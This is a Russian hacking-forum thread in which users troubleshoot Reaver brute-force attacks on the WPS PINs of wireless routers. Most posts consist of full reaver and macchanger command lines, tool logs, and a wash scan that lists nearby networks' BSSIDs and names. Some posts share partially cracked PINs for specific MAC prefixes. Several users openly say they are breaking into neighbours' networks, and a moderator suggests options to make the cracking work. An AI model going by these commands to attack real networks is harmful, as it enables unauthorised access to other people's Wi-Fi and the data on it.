Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. seonan

    seonan New Member

    Joined:
    1 Nov 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    WPS PIN для таких MAC точек доступа:
    54:04:A6:5D:50... 238373##
    F8:D1:11:32:1F... 961446##
    B0:48:7A:F5:7B... 090061##
     
  2. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Может поможете чем...
    Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax.
    Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9):
    Code:
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
    [+] Waiting for beacon from 80:1F:02:06:x:x
    [+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
    [+] Trying pin 12345670
    [+] Trying pin 00005678
    [+] Trying pin 01235678
    [+] Trying pin 11115670
    [+] Trying pin 11115670
    [+] Trying pin 22225672
    [+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin)
    
    Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра:
    Code:
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin)
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin) 
    ...
    [+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin)
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678
    [!] WARNING: 25 successive start failures
    [+] Trying pin 12985678 
    И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv):
    Code:
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
    [+] Switching mon0 to channel 9
    [+] Waiting for beacon from 80:1F:02:06:x:x
    [+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request 
    Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d...
    С другими точками подбор идет...

    Из за чего может быть эта ошибка-Receive timeout occurred??
    Заранее Спасибо!
     
    #342 pav087, 19 Nov 2012
    Last edited: 19 Nov 2012
  3. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,239
    Likes Received:
    7,397
    Reputations:
    112
    Думается варианта тут всего два:
    1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.
    2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
     
  4. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db.
    По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m...
    Делал так:
    Code:
    ifconfig wlan0 down
    macchanger -m (мак клиента) wlan0
    ifconfig wlan0 up
    airmon-ng start wlan0 
    reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv
    handshake ловится практически сразу, но брут не помогает...
     
  5. теща

    теща Экстрасенс

    Joined:
    14 Sep 2005
    Messages:
    2,027
    Likes Received:
    526
    Reputations:
    285
    тема для брута http://forum.antichat.ru/thread274700.html
     
  6. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,239
    Likes Received:
    7,397
    Reputations:
    112
    Нужно сменить МАС-адрес на интерфейсе. Делаем так:
    Code:
    ifconfig mon0 down
    macchanger -m 00:01:02:aa:bb:cc mon0
    ifconfig mon0 up
    
    Это будет совсем другое дело. Macchanger берём здесь если нету.
     
  7. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
     
    #347 pav087, 19 Nov 2012
    Last edited: 19 Nov 2012
  8. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,239
    Likes Received:
    7,397
    Reputations:
    112
    Нет.
     
  9. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... :( Сигнал до точки ~ -59db. Клиента ~ -56db.

    Может точка заблокировала WPS до перезагрузки?
    Ведь как только начал подбирать, дошло до 11% за час...
    Может есть какие-нибудь еще идеи? :confused:
     
  10. Buran

    Buran Elder - Старейшина

    Joined:
    25 Feb 2011
    Messages:
    1,239
    Likes Received:
    7,397
    Reputations:
    112
    На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.
     
  11. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Изначально начался подбор на родном маке TL-WN7200ND, но дошел до 11% и все никак, тепер WARNING: Receive timeout occurred лезет и всё, хоть сначала подбирай или с последнего пина всеравно ошибки..:confused:
    Мак подставлял клиента, который ассоциировался на этой точке, но также пробовал запускать ривер с 2-x других wifi карт соответственно с разными маками, та же беда лезет, хотя на этих картах другие точки также ломались как и на TL-WN7200ND...
     
    #351 pav087, 20 Nov 2012
    Last edited: 20 Nov 2012
  12. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    с другими- [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    и так 10 раз и ступор.
    Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.
     
  13. user_bad

    user_bad Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    94
    Likes Received:
    12
    Reputations:
    1
    второй случай имею на роутере NETGEAR и ничего не получается, как будто М5 вообще не бывает, переставлял цифирку подбор идет дальше но результата нет...
     
  14. pav087

    pav087 New Member

    Joined:
    15 Nov 2012
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Отпишусь по своей проблеме - WARNING: Receive timeout occurred

    Отключили в доме свет не надолго, подбор пошел опять, видимо точка блокировалась, а после перезагрузки опять давала подобрать.
    PIN
    80:1F:02:06:x:x - 686018xx может кому пригодится...
     
  15. SubFear

    SubFear New Member

    Joined:
    25 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    F1! F1! F1!

    BackTrack 5 R3 BlackHat

    root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 52:26:ED:8F:4D:E2
    [+] Associated with 52:26:ED:8F:4D:E2 (ESSID: HDS)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request

    root@bt:~# wash -i mon0 -C -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    ---------------------------------------------------------------------------------------------------------------
    14:A9:E3:03:24:22 1 -84 1.0 No dmitriyconshin
    14:A9:E3:02:4B:3A 1 -81 1.0 No Domolink_451608_R_msk
    00:26:5A:31:D9:50 1 -86 1.0 No dlink
    C8:6C:87:41:25:1F 1 -76 1.0 No O_O
    50:67:F0:16:FE:3C 1 -87 1.0 No Andrey
    14:A9:E3:01:50:0E 1 -87 1.0 No DOMOLINK_FREEPORT_01500E
    B0:B2:DC:3C:7C:30 1 -86 1.0 No Domolink_532202_R_msk
    14:A9:E3:02:18:C6 3 -80 1.0 No DOMOLINK_FREEPORT_0218C6
    34:08:04:14:7C:BE 6 -86 1.0 No dlink
    20:CF:30:CE:10:59 11 -86 1.0 No mksbag

    пробовал включать aireplay-ng но как он должен работать я не в курсе. не помогло. я вообще в линуксе 0. пока иду на ощупь, с закрытыми глазами. помогите плз. может советом, может ссылочкой на мануальчик. сейчас думаю попробовать wifislax 4.2 final/ может он поможет. только какие там команды прописывать....

    та сетка которую я пытаюсь нагнуть имеет самый сильный сигнал. в wash она присутствует. просто в поле копирования не попала.

    кстати. я пробовал reaverom все сетки корячить. и у всех одно и тоже. ломанул только одну. с совершенно убогим сигналом. минут за 20.
     
    #355 SubFear, 27 Nov 2012
    Last edited: 27 Nov 2012
  16. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,816
    Likes Received:
    18,487
    Reputations:
    377
    Рекомендую прописать команду следующим образом:
    reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv

    Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.

    Опция -a, позволяет оптимизировать работу Reaver.

    Про доп опции к Reaver почитайте тут.
    Уверены, что на точке "HDS" включен WPS ?
    В приведенном вами списке wash её нет.
     
    _________________________
    #356 user100, 27 Nov 2012
    Last edited: 27 Nov 2012
    1 person likes this.
  17. SubFear

    SubFear New Member

    Joined:
    25 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    вчера пробовал прописывать -vv --dh-small результат тот же.
    в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.
     
  18. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,816
    Likes Received:
    18,487
    Reputations:
    377
    Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.
     
    _________________________
  19. SubFear

    SubFear New Member

    Joined:
    25 Nov 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    хороший сигнал по всей квартире. предполагаю что это ктото из соседей снизу либо сверху. у меня 1 с очень хорошим сигналом 3-4 с нормальным. и ещё 5-7 со слабым. вот одну со слабым я ломанул а с остальными такая вот засада.
     
    1 person likes this.
  20. Oxy

    Oxy New Member

    Joined:
    29 Nov 2012
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Взломал давно dir-615 c помощью dwa-510 + самопальная антенна, заняло около 10 суток, дак сейчас пароль хозяева сменили, а я пин забыл :D , точнее последние 4 цифры. Сейчас приспособил роутер с openwrt для этого дела. А вообще, плохи дела становятся с уязвимостью, почти все современные роутеры идут с отключенным wps. У меня из 15 сетей только 2 определяются как уязвимые.